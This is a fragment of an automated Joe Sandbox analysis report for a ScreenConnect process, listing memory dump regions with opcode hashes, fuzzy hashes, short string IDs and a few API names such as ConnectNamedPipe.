                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fcb1c59deea8f0b383e976d06bae94f4608223d90d55c82b1a986ed9e736550b
                                                                                            • Instruction ID: a6c5c1e2e5af21b8d686ca42a2569616a58683f608dd8b5975f7d39fdb5fbb87
                                                                                            • Opcode Fuzzy Hash: fcb1c59deea8f0b383e976d06bae94f4608223d90d55c82b1a986ed9e736550b
                                                                                            • Instruction Fuzzy Hash: 2EC1B330E9DE4F4AE79AA7288465AB972D2FF94380F544479D04ED76C2DE2DFC06C241
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fe81aad07f17aa281582c829f2122e8a88409ef538db762be23418397b22bf32
                                                                                            • Instruction ID: 3385414bb11f9f956ca469181090e88956e6994ff6235677c6d694e42748bee7
                                                                                            • Opcode Fuzzy Hash: fe81aad07f17aa281582c829f2122e8a88409ef538db762be23418397b22bf32
                                                                                            • Instruction Fuzzy Hash: E5A19431E59E1F4AE7A9A7288550AB972D3FF943C4F544039D04EE36C1DE29FC46D240

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ?N_I$N_^^
                                                                                            • API String ID: 0-1457375974
                                                                                            • Opcode ID: dbd1eb70cfec566686a7d0d397eb0dd75de5663e36559c6ad759f49c02dcc030
                                                                                            • Instruction ID: a9a454ae682e39ef06f49e82d7b2e0ba682abf9004154397b6bbf1f67e9aac37
                                                                                            • Opcode Fuzzy Hash: dbd1eb70cfec566686a7d0d397eb0dd75de5663e36559c6ad759f49c02dcc030
                                                                                            • Instruction Fuzzy Hash: FBD10713F4D9924BE315AAECF8542F96BD1FFC53B171801BBD288CB187E814A84687D2

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: SN_^$UN_I
                                                                                            • API String ID: 0-4067239722
                                                                                            • Opcode ID: d5856bf2ec3a103cb35c292951a0afb7afdcc986a410208858a582439ef6e61c
                                                                                            • Instruction ID: a26c44e5036411badf0729ec6c3431a3c3aec6f1aca9479098a3d719fd33fdba
                                                                                            • Opcode Fuzzy Hash: d5856bf2ec3a103cb35c292951a0afb7afdcc986a410208858a582439ef6e61c
                                                                                            • Instruction Fuzzy Hash: 41510467E0D6D34FE34296ACF8A51E97B91FF926A070801B7D1988B0D7EE095C06D392

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C33000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C33000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c33000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID: MitigationPolicyProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1088084561-0
                                                                                            • Opcode ID: 4623627af4927c2b6b24b9f27ceb4083605a608ae85c76944927b6610508f670
                                                                                            • Instruction ID: 96c2a299f10568c6e919704db7565c51b6bb35dcfc7a8f4ac564d22c33db2eac
                                                                                            • Opcode Fuzzy Hash: 4623627af4927c2b6b24b9f27ceb4083605a608ae85c76944927b6610508f670
                                                                                            • Instruction Fuzzy Hash: B6514831D1CB4A8FDB15AFA8D84A5E97BE0FF55350F04017FE089C3192DE68A846CB92

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 422 7ff886c55db1-7ff886c55dbd 423 7ff886c55dbf-7ff886c55dc7 422->423 424 7ff886c55dc8-7ff886c55e90 ConnectNamedPipe 422->424 423->424 428 7ff886c55e98-7ff886c55ee0 call 7ff886c55ee1 424->428 429 7ff886c55e92 424->429 429->428
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C53000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C53000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c53000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConnectNamedPipe
                                                                                            • String ID:
                                                                                            • API String ID: 2191148154-0
                                                                                            • Opcode ID: 7b1151afe5a65c18060bd8f92d7e456069a0b92af4f62f0325eaed467360be66
                                                                                            • Instruction ID: fc20cc282de65080f264a8ca133b8b9d40357f6e008d0ae4a7aea0490b165d0c
                                                                                            • Opcode Fuzzy Hash: 7b1151afe5a65c18060bd8f92d7e456069a0b92af4f62f0325eaed467360be66
                                                                                            • Instruction Fuzzy Hash: B741DE31908A5C8FDB59EF98C849BE9BBF0FF65310F00826AD009D7256CB74A885CB81

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: T_H
                                                                                            • API String ID: 0-97390371
                                                                                            • Opcode ID: 2c7147fbaff6a1507cb64469f0e469b93b429c69a2e49229172aa9f42092384b
                                                                                            • Instruction ID: 0b7b53fccb89b2e06764118aa53c4bd2046f6387ebcbd6723cc209267923277d
                                                                                            • Opcode Fuzzy Hash: 2c7147fbaff6a1507cb64469f0e469b93b429c69a2e49229172aa9f42092384b
                                                                                            • Instruction Fuzzy Hash: 0651B131F1CD4B4FEB99EA6C99966B877D3FFA9784B040079D40DD7292DD28AC028341

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: qN_^
                                                                                            • API String ID: 0-959677767
                                                                                            • Opcode ID: b6ebab5f4c573b3a73e030dbd7d84cbc5bc9b4c718e050145086eb94b4a6aff8
                                                                                            • Instruction ID: 66f045c6c67722e069c12171368b5371d1632e650590365aed68bb208740991b
                                                                                            • Opcode Fuzzy Hash: b6ebab5f4c573b3a73e030dbd7d84cbc5bc9b4c718e050145086eb94b4a6aff8
                                                                                            • Instruction Fuzzy Hash: 9E512330A58A498FDB98EB2CD495A7177E2FFA434070500B9D08ECB6A7DE29EC42C741
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: AN_L
                                                                                            • API String ID: 0-983633070
                                                                                            • Opcode ID: 4daa01d8dff20a2090eeccd6426058949372190134997277e325796debb25bb6
                                                                                            • Instruction ID: beb37707cd08fec5372563d623a82fb2f90d4b8867452b2543ec045a1227b661
                                                                                            • Opcode Fuzzy Hash: 4daa01d8dff20a2090eeccd6426058949372190134997277e325796debb25bb6
                                                                                            • Instruction Fuzzy Hash: 47411661E1CD874BE789EA6CF5856B977E2FFA8790714007AD04EC3696ED24BC028381
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: pj
                                                                                            • API String ID: 0-1928120625
                                                                                            • Opcode ID: a172ea76e07aab6574f17de92748d36c6417db701aeff98eb087bf942935697e
                                                                                            • Instruction ID: b009f907244bc7c214019258590e25deb6ababe7f078f973363020cea429d516
                                                                                            • Opcode Fuzzy Hash: a172ea76e07aab6574f17de92748d36c6417db701aeff98eb087bf942935697e
                                                                                            • Instruction Fuzzy Hash: 0441C232E2CD474BEB59AA6CE4556B573E2FBA8750710017AD00EC36C7ED18BC029782
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: AN_L
                                                                                            • API String ID: 0-983633070
                                                                                            • Opcode ID: 47b53c8c4d039b75b55e6c50b25abe31f33a054a325466bd789806bb606a5ca0
                                                                                            • Instruction ID: b909e0eda5b54222cd50c1f572da3b4cde114685c31388e0e82a9c0b15c6feca
                                                                                            • Opcode Fuzzy Hash: 47b53c8c4d039b75b55e6c50b25abe31f33a054a325466bd789806bb606a5ca0
                                                                                            • Instruction Fuzzy Hash: 4B31F771E28D874BE798EB6CE5855B573D2FFA8780714417AD04EC32E6ED24BC029781
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c8844927ef00ea4c935a1c3d613ef7983a64add570ac48900dbc1870e552e4ea
                                                                                            • Instruction ID: 9d304e6330b374ab260bf9852c26d5695c2514ec820fa8f6167f9944f4032a6d
                                                                                            • Opcode Fuzzy Hash: c8844927ef00ea4c935a1c3d613ef7983a64add570ac48900dbc1870e552e4ea
                                                                                            • Instruction Fuzzy Hash: 17C1E431E1CA8B4FEB99EA6CD8557B977D2FF98784B1401BAD04DC7282DD24AC02D781
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4f03a99988bd700b152d1a44be931373e02ece6cbbb2a156fcd2e4bcf6ea687c
                                                                                            • Instruction ID: 5d79aaa3254567f94dd5b8f64bee2a529234d026098c0e809263fa047ea3c33a
                                                                                            • Opcode Fuzzy Hash: 4f03a99988bd700b152d1a44be931373e02ece6cbbb2a156fcd2e4bcf6ea687c
                                                                                            • Instruction Fuzzy Hash: 8DB12832D4DA4E4BEB5AEA2894528B577E0FF50390B04057ED44EDB987ED18FD0AC381
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 632ec79105f7b835fe2018e517f9219d25e6645925e7336343b50d5046d8a4d6
                                                                                            • Instruction ID: 86fbac10faefcccf3f6966f6cc71fb0abcf7e0696817c1e9d8164a2b7fa547f5
                                                                                            • Opcode Fuzzy Hash: 632ec79105f7b835fe2018e517f9219d25e6645925e7336343b50d5046d8a4d6
                                                                                            • Instruction Fuzzy Hash: 2AB1D771A1CE8B8FDB89EF68D8956A577E1FF68354B0001B9C41EC7286DE24EC12D781
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8192c5634cc131d9c022d33f0fe0e2f93375240923e7558380ac0b48bbd129b6
                                                                                            • Instruction ID: 3359fe1170736ffac6993f912e9f500c11cde67bceca5ced1c09e164128b1f26
                                                                                            • Opcode Fuzzy Hash: 8192c5634cc131d9c022d33f0fe0e2f93375240923e7558380ac0b48bbd129b6
                                                                                            • Instruction Fuzzy Hash: 7FB17531A18B4B8FDF98EF28D494AA537E2FF69344B5405ADD41AC7296CB35EC02CB41
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4fae7d0c3a6d77908ba6a41864662313c1eae806ff320a2d627a25bfd78a9742
                                                                                            • Instruction ID: 2731d02c8d5c4ae19e450e7c552b18bde3fa24392dc4ec2a6492da0ecc918575
                                                                                            • Opcode Fuzzy Hash: 4fae7d0c3a6d77908ba6a41864662313c1eae806ff320a2d627a25bfd78a9742
                                                                                            • Instruction Fuzzy Hash: F491D221B98A4A4FE7A5EB6CD499B7577D2FFA8350F0401BAD00DC7296DD18EC01C782
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a1f630ff0f9ed8f97ac6103670b5b18110bb3775bf225ce6294be2f8602aa411
                                                                                            • Instruction ID: b4398131437ee19eb62df97d78f1b678bad358d471b5d086157a7861d8749e0d
                                                                                            • Opcode Fuzzy Hash: a1f630ff0f9ed8f97ac6103670b5b18110bb3775bf225ce6294be2f8602aa411
                                                                                            • Instruction Fuzzy Hash: 34918434A18A4F8FDF84EF28C490AA577E2FF99354B1445A9D41ECB286DA35EC42C741
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7c969b30a3c351ed933d265b6fc3ab464cc1ebaecf6b029f378717672d79c28b
                                                                                            • Instruction ID: eeb14bf5429b303e044cd09649e4063820fbaadf315d8ee668b033f21d57f22b
                                                                                            • Opcode Fuzzy Hash: 7c969b30a3c351ed933d265b6fc3ab464cc1ebaecf6b029f378717672d79c28b
                                                                                            • Instruction Fuzzy Hash: 91818E71A18A8B8FDB88DF68CDA4AA537D2FF59344F1502A9D45EC72D2CB35AC12C701
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1a9316fdaad811da5d83f16c369894d774f39a2836b98e38bb0db897da498788
                                                                                            • Instruction ID: 49ceacfd60dc83f3b15cfb48ce98197c3c49514292a43e41a9ca4db3f7f68b7b
                                                                                            • Opcode Fuzzy Hash: 1a9316fdaad811da5d83f16c369894d774f39a2836b98e38bb0db897da498788
                                                                                            • Instruction Fuzzy Hash: 4B710231A18A4F4FDB95EB6CC445BA677E1FFA8340B1441BAD00DC7296DE28EC42C781
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6066ed2820def6cf3bc68dc09046740fb8e18547d5ca7047f1faf42eeb5e1f23
                                                                                            • Instruction ID: d9820873a5b8cfa84946db0b68ffa82c8934a7640d5c026fe6ebbfbb8adb55b9
                                                                                            • Opcode Fuzzy Hash: 6066ed2820def6cf3bc68dc09046740fb8e18547d5ca7047f1faf42eeb5e1f23
                                                                                            • Instruction Fuzzy Hash: 5F71C53295CA0E4BEB5AFE14D4528B573E1FF64340B50463DD44E97A82EE28FD4AC781
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6b1af4498e54a798d8e60d2e00c3051032c4d3de7cbed0f3722efadf0419837d
                                                                                            • Instruction ID: adc358742dfd014b4cf23bd7149253c5c1c70bf46c4a0ceee3f4acb3907961fc
                                                                                            • Opcode Fuzzy Hash: 6b1af4498e54a798d8e60d2e00c3051032c4d3de7cbed0f3722efadf0419837d
                                                                                            • Instruction Fuzzy Hash: 90719331E99A0B4AF799EB288550AB972D3FF943D4F504439D04EE36C2EE29FC46D240
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e73a3acbe6268c9c43d324d7c443f873d500886e2d77999f1b02a3bbe66ad1f8
                                                                                            • Instruction ID: 8521d561ebff7418cd87e33958c3f26f1f73b5efe6b8437ed106929c376209c0
                                                                                            • Opcode Fuzzy Hash: e73a3acbe6268c9c43d324d7c443f873d500886e2d77999f1b02a3bbe66ad1f8
                                                                                            • Instruction Fuzzy Hash: D4511421E1D6CA4FD356AB7898652B97FB1FF56240B4801FBD049C7193DD286C46D342
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b6b06d13c925d23d57bcb160102f96887057cdf70ab4875ed5812f483df6838a
                                                                                            • Instruction ID: 97c331fee400ecef95227897e1e133f72a6d5afb861118f6c1299f9ae2ede7d5
                                                                                            • Opcode Fuzzy Hash: b6b06d13c925d23d57bcb160102f96887057cdf70ab4875ed5812f483df6838a
                                                                                            • Instruction Fuzzy Hash: 76616730A18A4F8FDBC4DF68C594BA637E1FF59304B5411ADD41ACB295CA35EC52C741
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 66adffde776ee42be36a648a11d9073b0fa08b2da92fe6462f1b7961e15901ac
                                                                                            • Instruction ID: fff870cdf6ce187ed84b80b63c5b50b0d58acf6b166cd612b45f0d6b19b3f432
                                                                                            • Opcode Fuzzy Hash: 66adffde776ee42be36a648a11d9073b0fa08b2da92fe6462f1b7961e15901ac
                                                                                            • Instruction Fuzzy Hash: E6611334648A4A8FDBDDEF18C0916A177E2FF98344B2445A9C06DDB687CA25EC47CB80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 840eb2baa062ace1bf4f7a640f4f96e0ebe0c6bb9a87620f326f301e9a3b5d84
                                                                                            • Instruction ID: b26840d20c3e6bb0b4d22f1918fb252c99bfbc58eca496830cf6b8018501a2ba
                                                                                            • Opcode Fuzzy Hash: 840eb2baa062ace1bf4f7a640f4f96e0ebe0c6bb9a87620f326f301e9a3b5d84
                                                                                            • Instruction Fuzzy Hash: 64515F70A1CA4E8FDF84DF18C8A4AA537E1FF69354B1402A9D42DDB696CB35EC42CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 88361070dec3739230f99d8b9e907009b63959c0902a32d9944005654c989079
                                                                                            • Instruction ID: 5e7c89e02b13e1986279881b50e37cdce1620674429328c6ea5d7d43b2fedf5b
                                                                                            • Opcode Fuzzy Hash: 88361070dec3739230f99d8b9e907009b63959c0902a32d9944005654c989079
                                                                                            • Instruction Fuzzy Hash: 1E514631F9898A8FE795FB6CE4956B977D2FF94354B04017AD00DC7293EE28AC018786
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e284d085ce63037ee8211909224963141787b5cd7bbafbe5ff6a2de0f9ac6f8e
                                                                                            • Instruction ID: ca31d164bf01e49c5af38adffab39ba13e74b765f4da4ba131a89cd989b524bf
                                                                                            • Opcode Fuzzy Hash: e284d085ce63037ee8211909224963141787b5cd7bbafbe5ff6a2de0f9ac6f8e
                                                                                            • Instruction Fuzzy Hash: B751D031A18E4F4FEB94EA5CC445B6673E2FBA8780B1041BAD00DC7296ED24EC0297C1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ac7330db99bf8e4fe27f8d9f0195aaa77f8ad9497a5e11b0d177fc9f3f1efb41
                                                                                            • Instruction ID: 74a44354d3bd1069c35b0c9fdf97f8ffd94f6b9ac9acc13893759afa14680cfd
                                                                                            • Opcode Fuzzy Hash: ac7330db99bf8e4fe27f8d9f0195aaa77f8ad9497a5e11b0d177fc9f3f1efb41
                                                                                            • Instruction Fuzzy Hash: C7412421E5DACA0FD746D77C58661B57BE0FF96290B0841FAC458CB5ABEE18EC06C342
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c46bf8b3feabadac385c3443d35baaac4046f603b9f1c56bfd0d16944a1f4c76
                                                                                            • Instruction ID: db6bfc83bbd0833729fc4ef517acf864d3d15f563a0ccd07363e28ce50841f96
                                                                                            • Opcode Fuzzy Hash: c46bf8b3feabadac385c3443d35baaac4046f603b9f1c56bfd0d16944a1f4c76
                                                                                            • Instruction Fuzzy Hash: 7D51AD32E5CA498FEB98DF289492AA537E1FF68750F0400B9C44EDB687DE25EC42C740
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c2159c0665afd41a9055fe3b413a5f96d8192adae8d0a1ab011332092d1d3dfc
                                                                                            • Instruction ID: 524429876f4203408c2e9d87dd2210b62f5ebf51d01cf4ecf491f371aa0bc139
                                                                                            • Opcode Fuzzy Hash: c2159c0665afd41a9055fe3b413a5f96d8192adae8d0a1ab011332092d1d3dfc
                                                                                            • Instruction Fuzzy Hash: 68517F70A18A8F8FDB89DF18C8617BA37E2FF99344B1401A9D45EC72D2CA25EC12D741
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 983652232d8017b9019c90b3445647adc4bd59e3d919caf14503d665db2cd319
                                                                                            • Instruction ID: a6ddf41177ba6bbecdf5debc4fcb07afb1bb52cc61e1feaa58890e93de0fd9d9
                                                                                            • Opcode Fuzzy Hash: 983652232d8017b9019c90b3445647adc4bd59e3d919caf14503d665db2cd319
                                                                                            • Instruction Fuzzy Hash: 98415632E5CA8D8FEB95E668A8540A93BE1FF99354F04017AD05EDB592DF24EC02C741
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 198ab563dcab9b232ee40a54e3b8e34b3e18ad8c9616f704a31afa23aea6b7ad
                                                                                            • Instruction ID: d75badd5e5a675d5da3ea6cab2a60048e44cde2ff7bce48f662239665a139719
                                                                                            • Opcode Fuzzy Hash: 198ab563dcab9b232ee40a54e3b8e34b3e18ad8c9616f704a31afa23aea6b7ad
                                                                                            • Instruction Fuzzy Hash: EA31821BE4E6D74EE303572C98A54D87F60EE921B9B0D01F7C5C8DB0E3E8155C4AC2A5
                                                                                            Memory Dump Source
